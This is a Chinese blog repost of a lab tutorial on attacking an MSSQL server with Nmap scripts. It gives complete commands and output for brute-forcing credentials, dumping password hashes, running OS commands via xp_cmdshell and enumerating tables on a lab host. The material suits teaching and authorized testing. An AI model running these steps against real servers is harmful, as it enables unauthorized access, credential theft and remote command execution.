利用Nmap对MSSQL进行渗透测试

最新推荐文章于 2022-03-11 13:19:52 发布
最新推荐文章于 2022-03-11 13:19:52 发布
阅读量651 收藏 2
点赞数
分类专栏: web 文章标签: sqlserver web安全 数据库
原文链接:https://www.secpulse.com/archives/170569.html
版权

Web安全 合天网安实验室 [img](javascript:void(0))

2021-12-03 5,503

利用nmap脚本对MS SQL Server 进行渗透测试,获取目标用户名、数据库表等信息。

准备阶段

攻击机器: Kali(装有nmap)

目标机器:Windows Server 2019 (安装SQL Server 2016)

nmap自带一系列用于测试的脚本,用于mssql的脚本可以通过如下语句查询:

$ locate *.nse | grep ms-sql    
/usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
/usr/share/nmap/scripts/ms-sql-brute.nse
/usr/share/nmap/scripts/ms-sql-config.nse
/usr/share/nmap/scripts/ms-sql-dac.nse
/usr/share/nmap/scripts/ms-sql-dump-hashes.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
/usr/share/nmap/scripts/ms-sql-info.nse
/usr/share/nmap/scripts/ms-sql-ntlm-info.nse
/usr/share/nmap/scripts/ms-sql-query.nse
/usr/share/nmap/scripts/ms-sql-tables.nse
/usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse

获取数据库版本信息

使用ms-sql-info脚本获取目标数据库版本等信息

nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
//-p 表示指定端口号、-Pn:不检测主机存活、--script 指定脚本

获取的信息如下:

image.png

用户凭证爆破

使用ms-sql-brute脚本可以对数据库用户名和密码进行枚举和爆破

nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
// --script-args 指定脚本参数;userdb= 指定用户名字典 ;passdb= 指定密码字典

结果如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WiQJCK8Y-1638854033672)(https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=Yjk0NjQ3MmFlYzlkNDRiNGY2ZDAyYzEwZTZkNWJlZGYsMTYzODQ0ODYwNDU0OA==)]image.png

得到的用户名和密码:

sa:Password@123
pentest:123456

执行SQL语句

利用前面得到的凭据,可以调用nmap的ms-sql-query脚本在目标上执行SQL查询

用法如下:

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="SQL查询语句" 192.168.91.133

列出目标上的所有数据库

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00051s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
|   [192.168.91.133:1433]
|     Query: sp_databases
|       DATABASE_NAME DATABASE_SIZE REMARKS
|       ============= ============= =======
|       master 7552 Null
|       model 16384 Null
|       msdb 21888 Null
|_     tempdb 16384 Null


Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

NetBIOS 信息收集

利用ms-sql-ntlm-info脚本对启用 了NTLM 身份验证的远程SQL Server主机NetBIOS信息进行收集。

原理是发送无效域和空凭据的MS-TDS NTLM 身份验证请求将导致远程服务以 NTLMSSP 消息进行响应,该消息会泄露包括 NetBIOS、DNS 和操作系统版本信息。

nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00053s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-ntlm-info:
|   Target_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
|   DNS_Domain_Name: WIN-8EIGFF6H8PR
|   DNS_Computer_Name: WIN-8EIGFF6H8PR
|_ Product_Version: 10.0.17763

MSSQL 密码哈希转储

使用ms-sql-dump-hashes可以导出mssql密码哈希,可以提供给John-the-ripper这类工具使用。

nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
Nmap scan report for 192.168.91.133
Host is up (0.0011s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [192.168.91.133:1433]
|     sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
|     ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
|     ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
|_   pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6


Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

命令执行

xp_cmdshell 是 Microsoft SQL Server 的一项功能,它允许系统管理员执行操作系统命令。默认情况下,xp_cmdshell 选项是禁用的。如果在目标服务器中启用了 xp_cmdshell,可以利用ms-sql-xp-cmdshell脚本在目标机器上执行系统命令。

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133


//ms-sql-xp-cmdshell.cmd= 指定要执行的命令
nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00047s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
|   [192.168.91.133:1433]
|     Command: ipconfig
|       output
|       ======
|       Null
|       Windows IP \xE9\x85\x8D\xE7\xBD\xAE
|       Null
|       Null
|       \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
|       Null
|         \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
|         \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
|         IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
|         \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81 . . . . . . . . . . . . : 255.255.255.0
|         \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
|_     Null

空密码登录测试

如果管理员将密码设置为空,那么攻击者就可以直接登录到数据库。

image.png

利用ms-sql-empty-password脚本可以对目标进行SQL Server 空密码登录测试

nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00056s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
|   [192.168.91.133:1433]
|_   sa:<empty> => Login Success


Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

查看数据库表

ms-sql-tables脚本可以列出目标的数据库表

Tips:默认情况下MSSQL中没有数据库,要新建一个数据库和插入表,不然执行下列脚本会报错。

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00079s latency).


PORT     STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
|   [192.168.91.133:1433]
|       pentest
|         table column type length
|         ===== ====== ==== ======
|         Table_1 password nchar 40
|         Table_1 username nchar 40
|      
|       Restrictions
|         Output restricted to 2 tables (see ms-sql-tables.maxtables)
|         Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_       No filter (see ms-sql-tables.keywords)


Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

本文作者:合天网安实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/170569.html加粗样式

明月清风~~
关注
专栏目录
渗透测试 ( 5 ) --- 扫描之王 nmap渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5732
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
渗透测试PTES标准流程(超详细)
热门推荐
一颗小白菜
04-15 1万+
渗透测试的基本流程一、什么是渗透测试?二、渗透测试的阶段过程 一、什么是渗透测试渗透测试就是利用学习掌握的技能通过一种模拟攻击的技术与方法,挫败目标系统的安全控制策略并获得控制访问权的安全测试方法,对网站进行渗透,发现其中的漏洞风险,并撰写报告告知客户,客户依据我们攥写的报告对漏洞和风险进行修补,防止攻击。 进行渗透测试的前提必须是在经过客户书面授权之后进行的! 如果没有取得客户的书面授权进行渗透测试是违法的行为,最少三年哦!在2016年11月7日通过2017年6月1日施行的《网络安全法》中有明确规定。
MS sql数据库检测工具
12-19
MSSQL数据库的检测工具,可以检测出哪些页有问题。
获取MSSQL Server中的相关信息(视图、存储过程、触发器、表)
weixin_33967071的博客
11-24 182
SQL SERVER得到某个数据库下面所有的表、视图、存储过程、触发器 select name from sysobjects where xtype='TR' --所有触发器select name from sysobjects where xtype='P' --所有存储过程select name from sysobjects where xtype='V' --所有视图select na...
利用Nmap对MS-SQLSERVER进行渗透
cnbird's blog
05-13 997
http://www.bitscn.com/os/linux/201304/194233.html
数据库渗透
qq_35012243的博客
05-18 2094
1.1 快速搭建 discuz 论坛 1.2 使用 kali 下 BurpSuite 对 discuz 后台注入 php 木马 1.3 使用 Cknife“菜函”上传 webshell 木马到网站 1.4 使用 Webshell 查看 mysql 数据库密码并盗取数据库 ** 1.1 快速搭建 discuz 论坛 ** 1.1.1 攻击 思路 想要拿下一台主机 A 的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞。 2、拿到对 A 有一定权限的身仹。如果对方是一个 WEB 服务器.
WEB渗透测试数据库
04-01
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB中间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目中的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目中的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、注册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象注入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象注入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt 注:有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web中间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典
E116-经典赛题-mssql数据库渗透测试.pdf
12-02
本文主要涉及的是针对MSSQL数据库渗透测试流程,这是一类常见的网络安全实践,用于评估和加固数据库系统的安全性。以下是整个渗透测试过程的关键步骤和涉及的知识点: 1. **网络扫描**: - 使用Zenmap工具进行...
网络安全渗透测试20w字全套笔记
最新发布
08-25
NMAP使用 工具 网站架构和指纹识别 其他信息 人员信息 初始访问 Web服务突破 前端 SQL注入 判断注入 数据库类型识别 MSSQL MYSQL Oracle PostgreSQL SQLite DB2 SQLMAP XSS CSRF PHP包含下载读取 XML SSRF DNSLOG ...
渗透测试工程师个人简历模板word电子版下载手机可编辑填写.docx
07-10
5. **渗透测试工具**:掌握Metasploit、KaliLinux2.0、AppScan、WVS、Burpsuite、SqlMap、Hydra、Safe3、Nmap、XSS等渗透测试工具,这些工具能帮助工程师进行更有效的安全测试。 6. **数据库操作**:熟悉Oracle、...
渗透数据库之Sybase
瞎几把学
01-17 945
<br />美国Sybase公司研制的一种关系型数据库系统,是一种典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。 Sybase提供了一套应用程序编程接口和库,可以与非Sybase数据源及服务器集成,允许在多个数据库之间复制数据,适于创建多层应用。系统具有完备的触发器、存储过程、规则以及完整性定义,支持优化查询,具有较好的数据安全性。Sybase通常与SybaseSQLAnywhere用于客户机/服务器环境,前者作为服务器数据库,后者为客户机数据库,采用该公司研制的PowerB
渗透————PHP+MYSQL数据库(上)
longger_lee
11-12 1017
SQL简单命令:         mysql -u username -ppassword -h ip   //进入MYSQL数据库         show database;  //查看数据库有哪些文件         select version();  //查看数据库版本         use admin;     //选择admin数据库         show table
数据库渗透_笔记篇
weixin_43736941的博客
08-07 1480
数据库写入shell 一.可利用sqlmap的–os-shell进行shell写入 利用条件: 存在注入点 要有file_priv权限 知道网站绝对路径 对web目录有写权限 复现过程 1.在centos(ip:172.16.2.240)上搭建漏洞环境sqli-LABS 2.因为写入需要file_priv权限,这里为了实验方便直接连上数据库进行查询,看到为空,说明对目录不做限制。file_priv权限查询如下: show global variables like '%secure%'; 如果为N
渗透数据库基础
十五年游戏主程转渗透之路
03-11 2045
mysql命令,渗透,infornation_schema
渗透之——数据库提权
冰河的专栏
01-04 4834
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85768994 一、SQL Server提权 1.启用或关闭xp_cmdshell --启用xp_cmdshell USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVER...
渗透测试——情报收集阶段——渗透测试信息数据库与共享
YT的博客
02-08 1937
使用数据库来保存渗透测试过程中获取的各种数据,这种数据库就是渗透测试信息数据库。在 Metasploit v4 中,提供了多种工具的数据库继承方案和数据导入接口,可以方便地使用这些功能将信息搜集的结果保存在 Metasploit 的数据库中。 使用渗透测试信息数据库的优势 使用方便:Metasploit 中的大量模块都使用了数据库接口,结果能够自动存入数据库中。Metasploit 提供了 db...
渗透第五课 数据库
qq_42048911的博客
11-20 325
暴库 数据库: access 文件形式data.mdb sqlsever/mysql(服务器) 找数据库连接文件 xycms类型的 后面加xydata/xycms.mdb 有特殊符号的进行URL编码解码 可以获取语法找到数据库文件 下载漏洞利用:down.asdp?FileName= 蜘蛛爬行 找到url 下载conn.asp conf...
Nmap渗透测试入门与深度探索
在使用Nmap进行渗透测试时,首先的基础操作是主机探测。通过指定IP地址或IP范围,Nmap能够确定网络上哪些主机是活跃的。例如,`nmap -A 192.168.0.100`将扫描目标主机的所有端口和服务,而`nmap 192.168.0.1-200`则...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值